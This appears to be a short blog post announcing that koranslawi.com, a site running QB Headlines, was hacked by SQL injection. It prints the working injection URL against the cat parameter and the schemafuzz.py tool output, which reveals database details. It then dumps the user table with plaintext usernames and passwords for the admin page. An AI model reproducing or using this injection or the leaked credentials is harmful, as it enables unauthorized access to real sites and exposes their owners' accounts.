Another site using QB Headlines. koranslawi.com hacked using sql injection
Tool = schemafuzz.py v5.0
Admin page = http://koranslawi.com/admin/
Admin usr:pwd = admin:qbpwd
[+] URL: http://koranslawi.com/index.php?cat=2+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 23:46:30
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: korans3_koranslawi
User: korans3_dj4far@localhost
Version: 4.1.22-standard
[+] Dumping data from database "korans3_koranslawi" Table "user"
[+] and Column(s) ['uname', 'pwd']
[+] Number of Rows: 3
[0] admin:qbpwd:
[1] invest:invest:
[2] adminos:admin:
[3] No data
[-] 23:46:39
[-] Total URL Requests 5
[-] Done
0 comments:
Post a Comment